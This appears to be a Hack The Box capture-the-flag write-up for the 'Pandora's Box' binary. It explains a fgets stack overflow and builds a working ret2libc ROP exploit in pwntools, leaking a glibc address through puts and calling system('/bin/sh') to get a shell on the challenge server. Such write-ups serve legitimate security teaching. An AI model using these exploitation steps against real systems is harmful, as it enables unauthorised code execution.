Pandora's Box


We are given a 64-bit binary called pb:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
RUNPATH:  b'./glibc/'

Reverse engineering

We can use Ghidra to analyze the binary and look at the decompiled source code in C:

int main() {
  setup();
  cls();
  banner();
  box();
  return 0;
}

Among others, this function calls box:

void box() {
  long num;
  char data [32];

  data._0_8_ = 0;
  data._8_8_ = 0;
  data._16_8_ = 0;
  data._24_8_ = 0;

  fwrite("This is one of Pandora\'s mythical boxes!\n\nWill you open it or Return it to the Library  for analysis?\n\n1. Open.\n2. Return.\n\n>> ", 1, 0x7e, stdout);
  num = read_num();

  if (num != 2) {
    fprintf(stdout,"%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n",&DAT_004021c7);
                    /* WARNING: Subroutine does not return */
    exit(0x520);
  }

  fwrite("\nInsert location of the library: ", 1, 0x21, stdout);
  fgets(data, 256, stdin);
  fwrite("\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n", 1, 0x4b, stdout);

  return;
}

Buffer Overflow vulnerability

The binary is vulnerable to a buffer overflow: data is a 32-byte buffer, but fgets is told to read up to 256 bytes from stdin into it (at most 255 characters plus a null terminator). Any input longer than the buffer is written past its end, over whatever is stored next on the stack.

We can check that it crashes in this situation (option 2):

$ ./pb

                ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙
                ▣                 ▣
                ▣       ◊◊        ▣
                ▣ ◊◊◊◊◊◊◊◊◊◊◊◊◊◊◊ ▣
                ▣       ◊◊        ▣
                ▣                 ▣
                ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙

This is one of Pandora's mythical boxes!

Will you open it or Return it to the Library for analysis?

1. Open.
2. Return.

>> 2

Insert location of the library: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

We will deliver the mythical box to the Library for analysis, thank you!

zsh: segmentation fault (core dumped)  ./pb

Since this is a 64-bit binary without a stack canary, we would normally expect the offset to the saved return address to be 40 bytes (the 32 reserved bytes, then the 8-byte saved value of $rbp, and right after that, the saved return address).

However, this time it is a bit different. The best thing is to check the disassembly of box:

$ objdump -M intel --disassemble=box pb

pb:     file format elf64-x86-64


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

00000000004012c2 <box>:
  4012c2:	55                   	push   rbp
  4012c3:	48 89 e5             	mov    rbp,rsp
  4012c6:	48 83 ec 30          	sub    rsp,0x30
  4012ca:	48 c7 45 d0 00 00 00 	mov    QWORD PTR [rbp-0x30],0x0
  4012d1:	00
  4012d2:	48 c7 45 d8 00 00 00 	mov    QWORD PTR [rbp-0x28],0x0
  4012d9:	00
  4012da:	48 c7 45 e0 00 00 00 	mov    QWORD PTR [rbp-0x20],0x0
  4012e1:	00
  4012e2:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
  4012e9:	00
  4012ea:	48 8b 05 1f 2d 00 00 	mov    rax,QWORD PTR [rip+0x2d1f]        # 404010 <stdout@@GLIBC_2.2.5>
  ...
  40139e:	e8 1d fd ff ff       	call   4010c0 <fwrite@plt>
  4013a3:	90                   	nop
  4013a4:	c9                   	leave
  4013a5:	c3                   	ret

Disassembly of section .fini:

We see that the function reserves 0x30 (48) bytes on the stack, and data starts at the very bottom of that space ([rbp-0x30]). Right above those 48 bytes come the 8 bytes of the saved $rbp from the previous stack frame, and after that the saved $rip (return address), which is what we want to overwrite with the buffer overflow. In total, we need 56 bytes of padding to reach the return address on the stack.
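The offset can also be written out as a small computation. This is only a sketch of the arithmetic, using the two values visible in the disassembly of box; the constant names are illustrative and do not come from the binary.

```python
# Distance from the start of `data` to the saved return address,
# using the values visible in the disassembly of box.
BUFFER_START_BELOW_RBP = 0x30  # data starts at [rbp-0x30]
SAVED_RBP_SIZE = 8             # the saved $rbp sits at [rbp]

offset = BUFFER_START_BELOW_RBP + SAVED_RBP_SIZE

print(offset)       # 56
print(hex(offset))  # 0x38
```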

Exploit strategy

Since the binary has NX protection, we must use Return-Oriented Programming (ROP) to execute arbitrary code. This technique makes use of gadgets, which are short sequences of instructions that already exist in executable memory and (usually) end in ret. We place a list of gadget addresses on the stack so that when a gadget finishes, its ret takes the next address from the stack and jumps to the next gadget. That list of addresses is what we call a ROP chain.

This is a bypass for NX protection since we are not executing instructions in the stack (shellcode), but we are redirecting the program to specific addresses that are executable and run the instructions we want.

In order to gain code execution, we will perform a ret2libc attack. This technique consists of calling system inside Glibc with a pointer to the string "/bin/sh" (which is also inside Glibc) as its first argument. The problem we must handle is ASLR, a protection that randomizes the base address at which shared libraries are loaded.

Since we want to call system and take "/bin/sh", we need to know the addresses of those values inside Glibc at runtime (these addresses will change in every execution). Hence, we must find a way to leak an address inside Glibc because the only thing that is random is the base address of Glibc; the rest of the addresses are computed as offsets to that base address.

To leak an address, we call a function like puts (or printf or write) and pass it an entry of the Global Offset Table (GOT) as first argument (for example, the entry for fprintf). This table contains the real addresses of the external functions used by the program (if they have been resolved), so puts will print the runtime address stored there. Since puts is used by the binary, we can call it through the Procedure Linkage Table (PLT), whose stub jumps to the real address of puts.

One more thing to consider is the use of gadgets. Because of the calling conventions for 64-bit binaries, when calling a function, the arguments must be stored in registers (in order: $rdi, $rsi, $rdx, $rcx…). For example, the instruction pop rdi will take the next value from the stack and store it in $rdi.

Exploit development

Nice, let’s start with the leakage process. These are the values we need:

Address of pop rdi; ret gadget (0x40142b):

$ ROPgadget --binary pb | grep 'pop rdi ; ret'
0x000000000040142b : pop rdi ; ret

GOT addresses:

$ objdump -R pb

pb:     file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE
0000000000403ff0 R_X86_64_GLOB_DAT  __libc_start_main@GLIBC_2.2.5
0000000000403ff8 R_X86_64_GLOB_DAT  __gmon_start__
0000000000404010 R_X86_64_COPY     stdout@@GLIBC_2.2.5
0000000000404020 R_X86_64_COPY     stdin@@GLIBC_2.2.5
0000000000403fa0 R_X86_64_JUMP_SLOT  puts@GLIBC_2.2.5
0000000000403fa8 R_X86_64_JUMP_SLOT  printf@GLIBC_2.2.5
0000000000403fb0 R_X86_64_JUMP_SLOT  alarm@GLIBC_2.2.5
0000000000403fb8 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5
0000000000403fc0 R_X86_64_JUMP_SLOT  fgets@GLIBC_2.2.5
0000000000403fc8 R_X86_64_JUMP_SLOT  fprintf@GLIBC_2.2.5
0000000000403fd0 R_X86_64_JUMP_SLOT  setvbuf@GLIBC_2.2.5
0000000000403fd8 R_X86_64_JUMP_SLOT  strtoul@GLIBC_2.2.5
0000000000403fe0 R_X86_64_JUMP_SLOT  exit@GLIBC_2.2.5
0000000000403fe8 R_X86_64_JUMP_SLOT  fwrite@GLIBC_2.2.5

Address of puts at the PLT (0x401030):

$ objdump -M intel -d pb | grep puts@plt
0000000000401030 <puts@plt>:
  40124a:       e8 e1 fd ff ff          call   401030 <puts@plt>
  401261:       e8 ca fd ff ff          call   401030 <puts@plt>
  40126d:       e8 be fd ff ff          call   401030 <puts@plt>

Address of main (0x4013a6):

$ objdump -M intel -d pb | grep '<main>'
00000000004013a6 <main>:
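With these four values, the leak payload can be assembled by hand. The following is a minimal sketch that uses only the Python standard library; the p64 helper is a local stand-in for the pwntools function of the same name, and the constant names are chosen here for illustration. The addresses and the 56-byte offset are the ones found above.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack('<Q', value)


POP_RDI_RET = 0x40142b  # from ROPgadget
FPRINTF_GOT = 0x403fc8  # from objdump -R
PUTS_PLT = 0x401030     # from objdump -d
MAIN = 0x4013a6         # from objdump -d

OFFSET = 56  # padding up to the saved return address of box

payload = b'A' * OFFSET
payload += p64(POP_RDI_RET)  # pop rdi; ret
payload += p64(FPRINTF_GOT)  # value popped into $rdi
payload += p64(PUTS_PLT)     # puts(fprintf@got) prints the runtime address
payload += p64(MAIN)         # return to main to send a second payload

# fgets stops reading at a newline, so the payload must not contain one
assert b'\n' not in payload

print(len(payload))  # 88
```

The payload is 88 bytes long, well within the 256 bytes that fgets accepts.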

I have shown the manual approach to start the ret2libc exploit. However, I will be using pwntools from now on.

Leaking memory addresses

We can use this Python script:

#!/usr/bin/env python3

import sys

from pwn import *

context.binary = elf = ELF('pb')
glibc = ELF('glibc/libc.so.6', checksec=False)
rop = ROP(elf)


def get_process():
    if len(sys.argv) == 1:
        return elf.process()

    host, port = sys.argv[1].split(':')
    return remote(host, port)


def main():
    p = get_process()

    offset = 56
    junk = b'A' * offset

    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(elf.got.fprintf)
    payload += p64(elf.plt.puts)
    payload += p64(elf.sym.main)

    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Insert location of the library: ', payload)
    p.interactive()


if __name__ == '__main__':
    main()

Here we have leaked the address of fprintf at runtime:

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 143704
[*] Switching to interactive mode

We will deliver the mythical box to the Library for analysis, thank you!

\xb0\x16\xe9\x98

        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙
        ▣                 ▣
        ▣       ◊◊        ▣
        ▣ ◊◊◊◊◊◊◊◊◊◊◊◊◊◊◊ ▣
        ▣       ◊◊        ▣
        ▣                 ▣
        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙

This is one of Pandora's mythical boxes!

Will you open it or Return it to the Library for analysis?

1. Open.
2. Return.

>> $

We also see that we have returned to main, which is necessary because we have to enter another payload without stopping the program.
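The raw bytes printed by puts still need to be turned into a number. Since puts stops at the first null byte, a userland address on amd64 typically arrives as 6 bytes and has to be padded back to 8 before decoding it as little-endian. Here is a small sketch with the standard library only; decode_leak is a hypothetical helper name, and the sample bytes are the little-endian encoding of an fprintf address reported in a later run of this write-up (0x7f47e48ff6b0), not the bytes shown on screen above.

```python
def decode_leak(raw: bytes) -> int:
    """Turn the bytes printed by puts into an integer address."""
    # puts stops at the first null byte, so pad back to 8 bytes before decoding
    return int.from_bytes(raw.ljust(8, b'\x00'), 'little')


sample = bytes.fromhex('b0f68fe4477f')
print(hex(decode_leak(sample)))  # 0x7f47e48ff6b0
```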

Now we need to compute the base address of Glibc, which is a simple calculation: we subtract the offset of fprintf inside Glibc from its real address at runtime, and the result is the base address. Let’s take all the offsets needed:

Offset of fprintf (0x606b0):

$ readelf -s glibc/libc.so.6 | grep fprintf
000000000005a4f0    11 FUNC    GLOBAL DEFAULT   15 _IO_vfprintf@@GLIBC_2.2.5
00000000000606b0   183 FUNC    WEAK   DEFAULT   15 _IO_fprintf@@GLIBC_2.2.5
0000000000134e20   192 FUNC    GLOBAL DEFAULT   15 __fprintf_chk@@GLIBC_2.3.4
00000000000606b0   183 FUNC    GLOBAL DEFAULT   15 fprintf@@GLIBC_2.2.5
000000000005a4f0    11 FUNC    GLOBAL DEFAULT   15 vfprintf@@GLIBC_2.2.5
0000000000134f00    28 FUNC    GLOBAL DEFAULT   15 __vfprintf_chk@@GLIBC_2.3.4

Offset of system (0x50d60):

$ readelf -s glibc/libc.so.6 | grep system
0000000000050d60    45 FUNC    GLOBAL DEFAULT   15 __libc_system@@GLIBC_PRIVATE
0000000000050d60    45 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.2.5
0000000000169140   103 FUNC    GLOBAL DEFAULT   15 svcerr_systemerr@GLIBC_2.2.5

Offset of "/bin/sh" (0x1d8698):

$ strings -atx glibc/libc.so.6 | grep /bin/sh
 1d8698 /bin/sh

Getting RCE

Then, we can compute the real addresses of system and "/bin/sh" at runtime because we have the base address of Glibc at runtime. Let’s check it out:

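    # Skip the program's closing message so that the next line is the leaked address
    p.recvuntil(b'thank you!\n\n')
    fprintf_addr = u64(p.recvline().strip().ljust(8, b'\0'))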
    p.info(f'Leaked fprintf() address: {hex(fprintf_addr)}')

    glibc.address = fprintf_addr - glibc.sym.fprintf
    p.info(f'Glibc base address: {hex(glibc.address)}')

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 150949
[*] Leaked fprintf() address: 0x7f47e48ff6b0
[*] Glibc base address: 0x7f47e489f000
[*] Switching to interactive mode

        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙
        ▣                 ▣
        ▣       ◊◊        ▣
        ▣ ◊◊◊◊◊◊◊◊◊◊◊◊◊◊◊ ▣
        ▣       ◊◊        ▣
        ▣                 ▣
        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙

This is one of Pandora's mythical boxes!

Will you open it or Return it to the Library for analysis?

1. Open.
2. Return.

>> $
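The same numbers can be reproduced by hand from the offsets found with readelf and strings. This is a sketch of the arithmetic only, using the leaked fprintf address from the run above; the constant and variable names are illustrative.

```python
FPRINTF_OFFSET = 0x606b0  # readelf -s glibc/libc.so.6 | grep fprintf
SYSTEM_OFFSET = 0x50d60   # readelf -s glibc/libc.so.6 | grep system
BIN_SH_OFFSET = 0x1d8698  # strings -atx glibc/libc.so.6 | grep /bin/sh

leaked_fprintf = 0x7f47e48ff6b0  # value leaked in the run above

glibc_base = leaked_fprintf - FPRINTF_OFFSET
system_addr = glibc_base + SYSTEM_OFFSET
bin_sh_addr = glibc_base + BIN_SH_OFFSET

print(hex(glibc_base))   # 0x7f47e489f000
print(hex(system_addr))  # 0x7f47e48efd60
print(hex(bin_sh_addr))  # 0x7f47e4a77698
```

pwntools performs the same additions for us once glibc.address is set, which is why the exploit can simply use glibc.sym.system and glibc.search afterwards.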

As a sanity check, we see that the base address of Glibc ends in 000 in hexadecimal, and that’s correct. Let’s finish the exploit:

    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(next(glibc.search(b'/bin/sh')))
    payload += p64(glibc.sym.system)

    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Insert location of the library: ', payload)
    p.recv()

    p.interactive()

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 151797
[*] Leaked fprintf() address: 0x7fdbb41c36b0
[*] Glibc base address: 0x7fdbb4163000
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$

But it does not work (Got EOF while reading in interactive). This might be a stack alignment issue (as in Labyrinth). A single ret gadget before calling system will do the trick (otherwise, we would need to use GDB to debug the exploit):

    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(next(glibc.search(b'/bin/sh')))
    payload += p64(rop.ret[0])
    payload += p64(glibc.sym.system)
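Why one extra ret helps can be checked with a bit of modular arithmetic. The sketch below assumes the usual System V AMD64 convention, where $rsp is 16-byte aligned right before a call, so a called function starts with $rsp equal to 8 modulo 16; functions such as system may rely on this when they use aligned SSE instructions. The helper name is hypothetical and the model only counts the 8-byte words of the chain that are consumed up to and including the address of the target function.

```python
WORD = 8  # bytes taken from the stack by each pop or ret on amd64


def rsp_mod16_at_entry(words_consumed: int) -> int:
    """Value of rsp % 16 when the target function starts executing.

    Assumes the saved return address of box is stored at an address that
    is 8 modulo 16, which is what a regular call from aligned code produces.
    """
    saved_ret_slot_mod16 = 8
    return (saved_ret_slot_mod16 + WORD * words_consumed) % 16


# Chain: pop rdi address, "/bin/sh" pointer, system address
print(rsp_mod16_at_entry(3))  # 0, not what a called function expects

# Chain: pop rdi address, "/bin/sh" pointer, ret address, system address
print(rsp_mod16_at_entry(4))  # 8, the same as after a regular call
```

Each additional word in the chain shifts $rsp by 8 bytes, so a single ret gadget is enough to flip the alignment.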

And now it works correctly:

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 154943
[*] Leaked fprintf() address: 0x7fe5fb7d36b0
[*] Glibc base address: 0x7fe5fb773000
[*] Switching to interactive mode
$ ls
flag.txt  glibc  pb  solve.py
$ cat flag.txt
HTB{f4k3_fl4g_4_t35t1ng}

Flag

So, let’s try remotely:

$ python3 solve.py 165.232.98.11:30618
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Opening connection to 165.232.98.11 on port 30618: Done
[*] Leaked fprintf() address: 0x7f0b43b8a6b0
[*] Glibc base address: 0x7f0b43b2a000
[*] Switching to interactive mode
$ ls
core
flag.txt
glibc
pb
$ cat flag.txt
HTB{r3turn_2_P4nd0r4?!}

The full exploit code is here: solve.py.